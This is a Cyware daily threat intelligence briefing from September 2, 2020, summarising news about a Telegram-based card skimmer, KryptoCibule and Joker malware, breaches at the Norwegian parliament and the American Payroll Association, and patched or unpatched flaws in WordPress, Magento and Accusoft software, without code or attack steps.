Cyware Daily Threat Intelligence, September 02, 2020

Share Blog post

The web skimming landscape is evolving as attackers continue to upgrade the capabilities of skimmer code. In the latest development, skimming actors have been found using a new skimmer code that uses Telegram as a channel to send stolen credit card details to its operators. Among the data sent includes billing dates, credit card numbers, expiry dates, and CVV numbers.

A new KryptoCibule malware family that is capable of stealing wallets and hijacking transactions has been spotted in the last 24 hours. It spreads via malicious torrents in archives pretending to be installers for pirated versions of popular software and games.

Researchers have also uncovered six malicious apps that are designed to distribute the notorious Joker malware. These apps are available on the Google Play Store and have accumulated a total of 200,000 downloads.

Top Breaches Reported in the Last 24 Hours

Norwegian parliament attacked
The Norwegian parliament had suffered a cyberattack last week that affected the email accounts of several elected members and employees, as well. The incident had also impacted the emails of some lawmakers.

APA user data stolen
The American Payroll Association (APA) disclosed that some user data was stolen from its website in a digital skimming attack. The agency explained that the attackers had exploited a vulnerability in its content management system to inject the skimmer code into the login page and the checkout section of the website. The malicious activity was discovered on July 31, 2020, and had been present since May 13, 2020.

Top Malware Reported in the Last 24 Hours

Malicious apps
Six malicious apps designed to distribute Joker malware have been found on Google Play Store. The apps are Convenient Scanner 2, Safety AppLock, Push Message-Texting&SMS, Emoji Wallpaper, Separate Doc Scanner, and Fingertip GameBox. In total, these apps have been downloaded nearly 200,000 times.

KryptoCibule malware
Researchers have discovered a new KryptoCibule malware family that steals cryptocurrency wallets, hijack transactions, and starts mining on infected machines. The malware relies heavily on the Tor network to communicate with its C2 servers. It spread via malicious torrents in archives pretending to be installers for pirated versions of popular software and games.

New web skimmer code
Researchers have shared the first publicly documented instance of a credit card skimmer that uses Telegram to send credit card details to its operators. It looks for fields of interest such as billing, payment, credit card number, expiry date, and CVV numbers on infected websites.

Top Vulnerabilities Reported in the Last 24 Hours

File Manager flaw fixed
Users of eIFInder File Manager have been urged to update to the latest version of the WordPress plugin following the discovery of a critical zero-day remote code execution vulnerability. The flaw, which has been assigned with the CVSS score of 10, can allow unauthenticated attackers to execute arbitrary code and upload malicious files on vulnerable sites. It exists in versions 6.0 to 6.8 and has been patched in version 6.9.

Vulnerable Magmi plugin
An unpatched cross-site request forgery (CSRF) vulnerability in the Magmi plugin for Magento online stores can be abused to execute arbitrary code on servers running Magmi. The flaw, tracked as CVE-2020-5776, stems from the lack of random CSRF tokens and can be abused by tricking administrators into clicking a malicious link.

Vulnerable Accusoft ImageGear
Two vulnerabilities have been fixed in the Accusoft ImageGear library that could allow an attacker to execute code on the victim machine or corrupt the memory of the application. The flaws are identified as CVE-2020-6151 and CVE-2020-6152. They exist in the TIFF handle_COMPRESSION_PACKBITS and DICOM parse_dicom_meta_info functionalities of Accusoft ImageGear 19.7 respectively.

 Tags

magmi plugin
cross site request forgery csrf vulnerability
joker malware
kryptocibule
american payroll association apa
skimmer code

Posted on: September 02, 2020

Get the Daily Threat Briefing delivered to your email!


More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.


Join Thousands of Other Cyware Followers!